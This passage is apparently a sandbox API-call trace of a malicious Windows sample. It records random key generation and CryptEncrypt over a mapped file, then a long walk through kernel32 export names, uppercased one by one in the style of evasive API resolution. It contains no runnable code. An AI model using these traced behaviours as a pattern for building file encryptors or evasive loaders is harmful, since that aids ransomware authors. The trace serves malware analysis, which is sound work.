MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.256] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.256] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.256] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.257] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0083.257] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.257] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.257] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.258] CloseHandle (hObject=0x454) returned 1 [0083.258] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.258] WriteFile (in: hFile=0x450, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0083.259] CloseHandle (hObject=0x0) returned 0 [0083.259] CloseHandle (hObject=0x450) returned 1 [0083.259] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.259] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.259] GetTickCount () returned 0x114d48e [0083.259] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.260] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.260] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.260] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.260] lstrlenA (lpString="kernel32.dll") returned 12 [0083.260] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.260] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.261] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.261] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.261] lstrlenA (lpString="ADDATOMA") returned 8 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.261] lstrlenA (lpString="ADDATOMW") returned 8 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.261] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.261] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.261] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.261] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.261] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.261] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.261] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.261] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.261] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.261] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.261] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.261] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.261] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.261] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.262] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.262] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.262] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.262] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.262] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.262] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.262] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.262] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.262] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.262] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.262] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.262] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.262] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.262] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.262] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.262] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.262] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.262] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.263] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.263] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.263] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.263] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.263] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.263] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.263] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.263] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.263] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.263] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.263] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.263] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.263] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.263] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.263] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.263] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.263] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.263] lstrlenA (lpString="BEEP") returned 4 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.263] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.263] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.264] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.264] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.264] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.264] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.264] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.264] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.264] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.264] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.264] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.264] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.264] lstrlenA (lpString="CANCELIO") returned 8 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.264] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.264] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.264] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.264] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.264] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.264] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.264] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.264] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.265] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.265] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.265] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.265] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.265] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.265] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.265] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.265] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.265] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.265] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.265] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.265] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.265] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.265] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.265] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.265] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.265] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.265] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.265] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.266] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.266] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.266] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.266] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.266] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.266] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.266] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.266] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.266] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.266] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.266] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.266] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.266] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.266] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.266] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.266] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.266] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, 